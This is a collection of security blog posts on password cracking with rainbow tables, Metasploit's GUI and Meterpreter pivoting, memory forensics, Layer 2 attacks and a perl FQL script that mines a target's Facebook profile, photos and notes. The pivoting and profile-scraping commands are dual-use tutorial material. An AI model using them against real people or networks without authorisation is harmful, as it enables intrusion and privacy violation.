Last ShmooCon something wicked and evil happened. The fine folks on the PDC mailing list decided it would be a great idea to have a place at Shmoo where we could all meet up and share Rainbow Tables. What a grand idea! After all, good Rainbow Tables can easily go well into the hundreds of gigabits so why not have a nice get together and share?

Small problem. Everyone showed up with empty hard drives. No one, not a single person, brought any tables at all.

Zip.

Add to this the fact that my external hard drive with my Rainbow Tables crashed out on me last week. So, we now have two important lessons to take from the Rainbow Tables saga. Lesson one: no one is willing to share. Lesson two: backups are kind of important.

To remedy this situation I went to the fine people at Project Rainbow Crack and ordered a new set of tables for NT and LANMAN hashes. You may say that simply downloading them would be cheaper, and you would be right. However, we were in a bind on a current pen test and needed them immediately. Turns out it would be much faster to order them and have them shipped to us rather than download them.

I went to the section the Project Rainbowtable site to buy the tables and ordered the USD $300 set. What I would get is a new 320 GB hard drive and the 272 GB of tables for LM and NT hashes to go with it. What I was not expecting was that overnight air was included in the cost.

These guys simply rock. The service was excellent, and their packing… well their packing was something to be seen to be belived.

As near as I could tell it was wrapped in bubble wrap, 4 years of newspaper compressed to 1" around the entire drive and the strongest tape known to man wrapped liberally around the drive.

First, I needed the right tools.

Finally, I was able to squeeze the box out and see what was sent to me. It was an external hard drive. No Liquor to replenish my stock. It would have been better if there was alcohol in the package. For this reason, and this reason only, they get 4 out of 5 stars.

Everything was in its place. The tables, and the software to make them sing. I was a bit disappointed to see that only the programs for Windows were included. A bit of a bummer, but that is ok. There are plenty of places online to find Linux and OSX programs that work with the tables that were sent to me.

Oddly enough, the software was WinRAR protected with a password of "abcde12345". I am pretty sure this has something to do with crypto export controls. But it still made me chuckle.

How did they work? Beautifully. We were able to crack an Admin LANMAN password hash in under 5 min, and a NT only hash in under 15min.

When you get the tables there will be a couple of things that you will notice. First, the tables are in .rtc format. This is no big deal, except other tools like Cain and Able will need the tables to be in .rt format. The fine folks at Project Rainbow Crack have a few excellent tools to covert the formats here.

I cannot recommend the product from the fine folks at Project Rainbow crack enough. The drive is ok and the service was prompt and the tables worked.

Also, I am currently backing up the tables to two different drives.

Next year I will be bringing some tables to share.

There are currently a number of great sites that offer free tables. Below are just a few:

http://www.freerainbowtables.com/

http://ophcrack.sourceforge.net/tables.php

Before you come to Shmoo get some tables and bring them to share with everyone else.

We will not have a repeat from last year.

-strandjs

While we aren't having a party this year, we are running a mini contest and offering up some tokens of appreciation for those who complete it. A badge of honor if you will...

Let's be clear. The end objective of this game is to speak a phrase to Darren or Larry so that it can be over heard by others (the louder the better!) while showing us the "official" picture of the phrase. We don't care how you show us the picture, be it print, or electronic but we will not do any computing for you, or place any storage devices in our computers.

Badges are limited so solve it early! While they get you nothing but bragging rights, shouldn't you be packing for DEFCON?

Oh, and everything you need to get started is in this blog post.

Best of luck.

A new GUI for Metasploit has been added tonight by ScriptJunkie to the Metasploit SVN Repository. This new GUI is multi-platform and it is based on Java, the Netbeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have Ninja Skills with Java and user interfaces. The GUI can be ran by invoking the msfgui script at the base of the Metasploit directory

./msfgui

This script simply executes the following command:

java -jar `dirname $0`/data/gui/msfgui.jar

Now to be able to run this GUI Java must be installed on the machine. Wen you run the command you should be greated by the following splash screen followed by this user interface:

Now this interface does not start since it can be used to connect to a remote msfrpcd session in another host. To start a msfrpcd session on a host so as to be able to connect remotely with msfgui the following command must be ran on that host:

./msfrpcd -S -U MetaUser -P Securepass -p 1337

we tell the msfrpcd Daemon to start with SSL disabled since there is no support for it right now, we specify the user with the –U switch, the password with the –P switch and the port to listen for inbound connection with the –p switch. The service will bind to the 0.0.0.0 address so it well listen on all interfaces, in the case you want it to bind to a specific interface you just tell it to what IP address to bind to with the –a switch and pass the IP as an option. When you run the command above the output should look something like this:

loki:msf3 cperez$ ./msfrpcd -S -U MetaUser -P Securepass -p 1337
[*] XMLRPC starting on 0.0.0.0:1337 (NO SSL):Basic...
[*] XMLRPC initializing...
[*] XMLRPC backgrounding...

Once it is up we just use the use connect to msfrpcd option in the File menu

This will bring up the following screen

There we just enter the data we set up at our remote host, we can also start a new connection from this screen and even change the path for our Metasploit folder to another copy if we wish to using the change path button.

To start a new session with the local copy just select the Start new msfrpcd option from the File menu, this will automatically start a msfrpcd session for you using the copy of Metasploit from where you launched msfgui. Once started we can the interact with it. Lest launch a Multi handler to receive some Meterpreter connections:

Once we select the multi handler a screen will appear that will let use choose our payload, depending on the payload we will be able to set the parameters for it:

Once we have set the options needed for our shell we just hit Run Exploit to launch the job and it should appear in the jobs screen as shown below:

When the Meterpreter session is received and established it will appear in the Sessions window and we can interact with it.

To interact with our shell we can simply select it and left click on it to provide the options of what we can do. One of the thing I like about what is being done with the GUI is the way that the Meterpreter scripts where integrated as actions on the menu with easy to understand groupings as well as most common commands. 

Here is the screen we would see if we selected form the System Information the Windows Enumeration, this launches the Winenum script and we can see it’s progress. We can even enter commands in the dialog box below and hit summit to send a command to the Meterpreter session once the script is finished.

We can even decide to access the servers file system and interact with it.

For pentesters do check under post exploitation the report feature for HTML activity log of what was done in the shell and Meterpreter sessions. I do invite you to play with the other options, modules and menu items and provide feedback including bug reports and features request for stuff to add the GUI. If you are a Java ninja you can provide patches and code that is also welcomed, you can do this at http://www.metasploit.com/redmine/projects/framework

By Mark Baggett

The Ethical Hacker Challenges are always a lot of fun. They are usually wrapped in a creative and entertaining movie theme (as if hacking something wasn't entertaining enough) and always present an interesting technical challenge. I always learn something new with each new challenge.

Over the Christmas break I took some time to explore the Facebook API for the Miracle on Thirty-Hack Street Challenge. Here is some of what I learned about the Facebook API. First, lets get an API key.

Obtaining an API key
To develop applications for Facebook you'll need a API Key. Getting an API key is very easy and only takes about 2 minutes. To obtain your key you need to add the "Developers" application to your facebook account. You can do this by logging in with your Facebook account at the url http://www.facebook.com/developers/. From there you create an application by clicking "Set up New Application", picking an application name and agreeing to the terms of use. You are then assigned an API key and a Secret key. If you are developing with an offline script such as python or perl then under your application's "Advanced Settings" set your application up as a "Desktop" application. Then, armed with your API and Secret key, you are ready to get started.

Start Coding
While there are various options available I really only want the ability to query facebook data using FQL. FQL or "Facebook Query Language" is a very SQL like query language that allows you to extract data from Facebook. Perl's WWW::Facebook::FQL libraries are pretty simple to use and should provide the functionality I need. After installing the require perl modules I threw together a small perl script that allows me to do FQL queries from the command line.

To use this script you'll need to plug in your own API Key, Secret, Username and Password. The username and password that you provide in the script will be used to do the data mining and determines what access you have to the target's data. Here is my very simple script:

use WWW::Facebook::FQL;
## Connect and log in:
## Key is the Application Key obtained from your facebook profile by adding the "DEVELOPER" app and creating an application.
## Private is the "Secret" from that same application
my $fb = new WWW::Facebook::FQL key => 'API KEY HERE', private => 'API SECRET KEY HERE';
## This is the account we will use to do the data mining. The more connections you have to the target (Friend, Friend of Friend, Networks, etc) the more information you will have access to.
$fb->login('facebook login name', 'facebook password');
#if User passed XML or JSON (or garbage) as the 2nd parameter set the format type to that
if ($ARGV[1]) {$fb->format = $ARGV[1]};
## Do a query and print the results:
print $fb->query($ARGV[0]);
## Release session
$fb->logout;

Using this script we can execute FQL queries from the command line like this:

markbaggett@ubuntu:~$ perl fql.pl "Select name from user where uid= "target facebook ID #"

This will return an XML response containing the users NAME for the targeted Facebook ID #. You can determine a targets Facebook ID # by looking at the web interface and simply hovering over a wall post or a picture. If the URL is something like this.... http://www.facebook.com/profile.php?id=11223344556677 then their ID would be 11223344556677. Since we can issue FQL commands from the command line we can do a little more advanced stuff like download all the users photos with a single command:

markbaggett@ubuntu:~$ for i in `perl fql.pl "Select src_big from photo where aid IN (SELECT aid FROM album WHERE owner=facebookID#)"| grep "src_big" | cut -d ">" -f2 | cut -d "<" -f1`; do curl -C - -O "$i"; done

Or display all data available on the account in the user table like this...

markbaggett@ubuntu:~$ perl fql.pl "select uid, first_name, last_name, name, pic_small, pic_big , pic_square, pic, affiliations, profile_update_time, timezone, religion, birthday, birthday_date, sex, hometown_location, relationship_status, significant_other_id, political, current_location, interests, is_app_user, music, tv, books, about_me, education_history, work_history, notes_count , wall_count, status, is_app_user, online_presence, locale, proxied_email, profile_url, pic_small_with_logo, allowed_restrictions, profile_blurb, family from user where uid="facebookID#"

Or dump all photo albums...

markbaggett@ubuntu:~$ perl fql.pl "select aid, owner, cover_pid, name, created, modified, description, location, size, link, visible, modified_major, edit_link, type, object_id from album where owner=facebookID#"

Or if for some reason we needed to extract the notes fields from an account and try every word in the notes as a password to a PGP encrypted PDF we could do something like this...

markbaggett@ubuntu:~$ for i in `perl fql.pl "Select content from note where uid= 100000565751882"`; do echo "$i" | gpg --passphrase-fd 0 --decrypt JudgeHenryLetter.pdf.gpg && echo "$i is the password" ; done

(If you missed it, that one line solves the Christmas Ethical Hackers Challenge)

A full list of all the Facebook tables and fields is available here.

Now, you can not simply use this to pull any data you want from a Facebook account. The information returned depends upon the permission granted by the user to the account used in your script. Users who share information with "EVERYONE" allow you to use this script and retrieve all their data. Granting access to "EVERYONE" is most often the default for data posted to Facebook accounts so the script will most likely returns pretty good results. Users may have changed the defaults and only granted access to "Friends" or "Friend of a Friend". In those cases, you would need to have the target OR the friend of the target to accept your friend request. The Facebook API will return the data based upon the permissions of the data element itself and not the data element's container object. So, if a user restricts access to the "NOTES" tab in Facebook to "ONLY FRIENDS" but a notes entry is set to allow access to "EVERYONE" then the note will NOT be accessible through the Web Interface, but it will be accessible via the API. Also, in some circumstances anonymous unauthenticated users can access photo's from a users account even when the photo object has permissions set to "Only Friends". More on that to come later. Of course, none of this should be used to violate anyones privacy or in violation of Facebook's terms of use.

Thanks to Ed and Kevin for all their work putting together the challenge. I always learn something new with every Ethical Hacker Challenge. Congratulations to all the other winners and honorable mentions. It looks like several people did some really awesome work and I don't envy Ed and Kevin's job in sorting through all the entries to choose a winner. But, I do appreciate the choice they made. :)

Eugenio Delfa made this AWESOME video and wrote some great Python scripts to do Facebook extracts. I found a copy of his scripts here. His scripts are great and I will probably use them rather than my own in the future.

JOIN MARK BAGGETT FOR SANS 504 IN RALEIGH NC JUNE 21-26 CLICK HERE TO SIGN UP

Two weeks ago, some of the PaulDotCom crew spent a couple of days down in Maryland hanging out with all of the great CCDC crew. While Paul and Darren played Red Team for the Mid-Atlantic Collegiate Cyber Defense Challenge, I got to play "the badge man".

It was my job to design and implement a physical access control system and conference badges that was "in scope" for the Red Team to attack, and the Blue Team to defend. Ultimately I wanted the badge to be RFID enabled, have a form factor similar to those found in industry. I also wanted them to be easy to transport and reproducible for those on student budgets. In that spirit, I'm here to spill my guts about the system, hardware and code so that you too can make this part of your cyber challenge.

The Hardware:

The hardware is quite simple. It uses:

A project enclosure of your choosing

The badges feature laser cut acrylic (thanks to the AS220 FabLab), and Q5 RFID tags rewritten and in EN4X02 emulation mode. While we wanted to provide an RFID reader/writer for each participant, the cost became prohibitive. Instead we had some hardware that featured the ACG Dual ISO OEM Module. Our module was sourced from Adam Laurie, author of RFIDIOt, which was used to read and write the Q5 RFID tags.

Red and Blue Team badges, minus the RFID card

The Code:

Darren the intern and I spent the better part of two weeks battling code to get this work, especially given that we were trying to compare two different variable types, and a host of other issues. What we did find that part of the problem had already been tackled before. The read and compare to a list of known values worked, but much of the rest of the code did not. The part that didn't work we knew how to fix so we used that as the base for the system. Once that was complete, it was simple as providing some feedback to the user that a badge read failed or succeeded.

Basically, the code takes input from the reader and compares it to a list of values. If it finds a match, it turns the green LED on for 3 seconds, continues to compare to the end of list and then waits for another badge and illuminates the red LED. If it doesn't match, it turns off the red LED for 1 second, and the illuminates it. Green means go, red means stop.

An installed reader

The Docs:

I also presented some information about the badge and some rules before the contest started. Those slides can be found here. Additionally, I did a wrap up of all of the ways I thought of to hack the badge system. Those slides can be found here.

This physical security is better...

Oh, I bet you want some other goodies! This file contains all of the code, lists of all of the RFID tag values, as well as wiring diagrams in image and Fritzing format.

Any and all feed back is welcome. E-mail me at larry@pauldotcom.com, or sent me a note on twitter to @haxorthematrix.

Enjoy!

By Mark Baggett

Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.

The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).

Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.

If you're not familiar with proxychains be sure to check out the post from last week.

Here is a video demo:

Nessus Scan through a Meterpreter Session from PaulDotCom on Vimeo.

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

There are many ways for the attacker to insert themselves in the middle of a conversation. Just some of the tools at the attackers disposal include:

• DNS Cache Poisoning (metasploit)
• NETBIOS Names spoofing (nbtool at skullsecurity.org)
• Lie about the DNS,WINS and/or default gateway with a rouge DHCP server (yersinia, ettercap)
• deliver a WPAD file or otherwise reconfigure the browser proxy (metasploit)
• IPv6 ISATAP spoofing
• Attack routing protocols such as BGP MITM
• IP source routing attacks (netcat)
• ICMP Redirect messages (ettercap)
• ARP Cache Poisoning (yersinia, ettercap, cain)
• Switch Port Stealing (ettercap)
• Layer2 Mac Flooding* (yersinia, macflood, macof)
• Gratuitous Spanning Tree BPDU Root messages* (yersinia)

Some of these attacks work across the internet, but most of these are limited to the LAN and rely on Layer2. The good news is that many of these attacks can be mitigated with new features deployed in the latest version of Cisco's IOS (12.2 or better). BPDU Guard, DHCP Snooping, DHCP Snooping +Dynamic Arp Inspection , DHCP Snooping + IP Source Guard, ARP Rate Limiting, Mac Address port security, PVLAN Protected, Isolated, Community and Promiscuous ports and 802.1x can all be used to effectively limit many of these attacks. Listener Brian Almond (Infosec Samurai) submitted this PDF on layer two security. Give it a gander! Nice work Brian.

Download Brian Almond's paper here

Other resources

http://isc.sans.org/diary.html?storyid=7567

http://www.ciscopress.com/articles/article.asp?p=1181682

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/dhcp.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/dynarp.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/bcastsup.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/port_sec.html

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

Last year on the show, Marcus J. Carey presented a tech segment about using memory analysis in penetration tests. Memory acquisition came into its own for incident responders a few years back. Even before tools like Volatility, Memoryze or HBGary's Responder were available, many incident responders, including me, used the strings command to perform rudimentary searches and "analysis" of memory artifacts.

Figure 1: strings output of a Linux VM's memory image. The highlighted "forensics" happens to be the root password.

Shortly after Carey's presentation, DarkOperator posted a Meterpreter script that would dump memory and save it offline for later analysis. Passwords are a high value memory artifact for penetration testers. As someone working in app sec and incident response, Carey got me thinking about other things that forensics practitioners may find commonplace, but that may be overlooked by penetration testers. Both disciplines inform each other.

Let's say you're a penetration tester (or an Amortized Perennial Threat as Shawn Moyer says he is) and you're working for a client who wants you to go beyond the shell. Your client has requested that you go after important company data. Databases are an obvious target, but companies also have critical information floating around in Microsoft Office documents (e.g. business plans, bid contracts, vulnerability remediation tracking information, etc.).

What is the best way to locate these documents? You could manually navigate the various common directories where people store documents, read the directory listings and copy down those files that look interesting. But this is a labor intensive process and you may miss something if the user has tucked important files in odd locations.

If only there were a place on the file system that held information about files, a place where we could look and see all of the files that had been opened on the system and that would map back to the location of those files, even if those files were on network shares or removable media. Fortunately for us, there is such a location, in fact, there are two well known ones.

Windows systems have a feature that creates shortcuts for common document types, including Office files when those files are opened by a user. The idea of using these shortcuts during a pen test is not new. In fact, it was mentioned before on Security Focus' Pen-Test mailing list, but I don't believe it's been ahem, weaponized until now.

These shortcuts or link files are created by Windows to facilitate the "Recent" document features of modern Windows operating systems. For Windows XP the default location for link files is under Documents and Settings\<username>\Recent with Microsoft Office files having their own location in Documents and Settings\<username>\Application Data\Microsoft\Office\Recent\. Vista and later versions of Windows have moved the recent link files to Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\ and Users\<username>\AppData\Roaming\Microsoft\Office\Recent. There may be other locations specific to other applications as well.

For the two common locations, I have created a Meterpreter script port of Harlan Carvey's lslnk.pl that is commonly used by forensics analysts to dump the contents of Windows' .lnk files.

dumplinks.rb can be used with the Meterpreter to dump the contents of Windows' .lnk files either to the Metasploit user's local file system, or to the console. By default, dumplinks.rb, runs in a less verbose mode than Carvey's lslnk.pl, in that it only reports the time stamps for the .lnk files themselves, then prints the time stamps contained within the .lnk files that are time stamps for the target file and finally, the target file's location is printed.

Enough drivel, here's a couple of screen shots:
Figure 2: dumplinks help screen

And one of the script in action, dumping to the console:
Figure 3: dumplinks sending everything to the console

Of course there are other tools and techniques that cross-over from forensics to penetration testing. I will be back with another, as soon as I can find the time. For now, enjoy the dumplinks.

Dave Hull describes his working life as on the Venns between incident response, forensics and web applicaiton security. He will be teaching SANS Forensics 508: Computer Forensics Investigation and Incident Response in Boston, March 15 - 20

After listening to Larry's excellent technical segment on dumping the event logs from a large list of computers, I decided to try it out on my own. If you missed the technical segment, you can find the notes here.    To do my own testing I needed to start with a large list of computers.   For my list, I want to have the names of every computer in the domain.   So I turned to "dsquery computer " to get a list of all computers. 

C:\WINDOWS> dsquery computer 

"CN=CONTROLER1,OU=Domain Controllers,DC=subdomain,DC=domain,DC=com"

BLA BLA BLA... Truncated

"CN=WORKSTATION1,OU=ORGUNIT1,OU=OrgUnit2,OU=OrgUnit3,DC=Subdomain,DC=Domain,DC=com"

BLA BLA BLA... Truncated again

The length of the results changes because of the variable number of subdomains, but fortunetly for us the workstation name is always the first part of the string.  It is always between the CN= and the first comma. We can strip out the workstation name with the "DELIMS" and "TOKENS" option of the FOR loop.  Also, by default DSQUERY will only return the first 100 results. This can be changed using the "-LIMIT" option. Setting the LIMIT to 0 returns all result. For now lets check our output looking at only two entries.

C:\WINDOWS>for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do echo %i

C:\WINDOWS>echo "CN=WORKSTATION1

"CN=WORKSTATION1

C:\WINDOWS>echo "CN=WORKSTATION2

"CN=WORKSTATION2

We are almost there. I need to strip the first 4 characters of the line. For this I stole a page or two from Ed Skoudis' play book. We can strip the first four characters with the SET command using the expression variable = %variable:~4%. But, since we are in a FOR loop we have to turn on delayed variable expansion and use ! instead of %.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in 

('dsquery computer -limit 2') do set name=%i  & set name=!name:~4! & echo !name!"

Dsquery has reached the specified limit on number of results to display; use a different value for the -limit option to display more results.

C:\WINDOWS>set name="CN=WORKSTATION1    & set name=!name:~4!   & echo !name!

WORKSTATION1

C:\WINDOWS>set name="CN=WORKSTATION2    & set name=!name:~4!   & echo !name!

WORKSTATION2

Now we have all the computer names in the domain being printed one at a time. I can dump all the names of the machines in the domain to file to feed Larry's event dumper.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 0') do set name=%i & set name=!name:~4! & echo !name! >> c:\temp\machines.txt"

Better yet, we could combine it with a WMIC command and other commands to do various useful tasks on our machines.  For example, if I want to query every machine in my network for an instance of a process that starts with CMD I could run the following:  (remember that % is a wild card in wmic)

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do set name=%i  & set name=!name:~4! & wmic /node:!name! process where "name like 'cmd%'" list brief"

Dsquery has reached the specified limit on number of results to display; use a different value for the -limit option to display more results.

C:\WINDOWS>set name="CN=WORKSTATION1    & set name=!name:~4!   & wmic /node:!name! process where "name like 'cmd%'" list brief

HandleCount  Name     Priority  ProcessId  ThreadCount  WorkingSetSize

33           cmd.exe  8         2308       1            1654784

C:\WINDOWS>set name="CN=WORKSTATION2    & set name=!name:~4!   & wmic /node:!name! process where "name like 'cmd%'" list brief

HandleCount  Name     Priority  ProcessId  ThreadCount  WorkingSetSize

33           cmd.exe  8         2368       1            1626112

So there you go.  Now using this basic syntax...

cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 0') do set name=%i  & set name=!name:~4! & Any command here based on !name!

... you can run any command you want on every machine in your domain.   

Join me for SANS 504 June 21-26

What am I talking about? I am talking about RAM!

Here are some of the things we can get from RAM, processes, network connections, open files, Encryption Keys – Bitlocker.

The last one Encryption keys from Bitlocker is an awesome presentation I read from Jesse Kornblum on how to get the keys for bitlocker, check it out: http://jessekornblum.com/presentations/omfw08.pdf

There are simply some great tools to get memory, You can use win32dd.exe. This tool will create a raw image file as well as write a MD5 hash of the output file you create.

My personal favorite though is Memoryze from Mandiant. You can find it here as a free download http://www.mandiant.com The cool thing about memoryze is that you can run enumeration tools to give you process information, the registry keys that are being used by the process, what DLL's are running, drivers loaded in memory, etc... The great thing about this is that you can do that on an image that it can enumerate from or on a live machine.

Here is how it works:

Open a command shell (cmd.exe) Change directories to where you installed Memoryze.

Type “MemoryDD.bat” It will create a directory called audits where it will put your memory image or

To write the image to a specific directory, type “MemoryDD.bat –output <directory_name>

To identify all open ports and their processes and Process Id's, type “Process.bat –ports true"

The output is put in xml format:

Notice above you can see the process forcefield.exe as process ID 900 it is making a connection out to IP address 68.142.101.68 on Port 80 This is simply a great way to tell what process is doing what. (ie…malware outbound connections)

Now suppose you wanted to look for rootkit's in Memory. You can use Mandiant's HookDetection.bat file. This executes RootkitAudit.Batch.xml. It identifies hooks in kernel memory often used to subvert the integrity of the system.  So you can see below the different processes and how the relate to the kernel or drivers etc…

Notice above you can see the module that has hooks into the kernel i.e 1394BUS.sys where it is located: \windows\system32\drivers\ and a description of it: “Driver”

If you had an unknown process  with hooks into the kernel you could find it here.

Now these are all great tools but, what do you do with a memory image after you have it? There are some basic techniques that you can use to do analysis.  I would start with a “strings” command.  So you can run strings memory.img > memory.str. Then you can begin to parse the file for emails, websites surfed to, or connected to by malware, passwords, blogged text, and unknown executables.

Once you have your image, you might choose to use a tool called Volatility. This tool simply ROCKS!

Here is how it works using Linux:

python volatility command –f /path_to_windows_memory_image

The keyword command refers to a series of commands that you can choose from. Here is a list:

So what can we do with this? Let me show you. First let’s see what processes are running in memory.

first I type the command:

python volatility pslist –f /path_to_image/imagefile.img

and I will see output like this:

Now you can see the executables running. You can also see from the second column what the PID (Process ID) is. So let’s say we did not know what jusched.exe was. (PID 2228) and we thought it might be malware and would like to send it to virus total. Well then, let’s grab it right out of the memory.

python volatility procdump –p 2228 –f /path_to_image/imagefile.img

Now we have carved that process out. However to be sure we did this correctly let’s take a look at what it is using khexedit. Since this is suppose to be an .exe file it should start off in hex with MZ

so in linux khexedit executable.2228.exe

We can see that it is in fact what we are looking for so we could now send this up to virus total, or look deeper into the file to see what it does.

Well that is it for memory on this post. As always be good, be safe, hack legally, responsibly, and share the knowledge -–I’m Out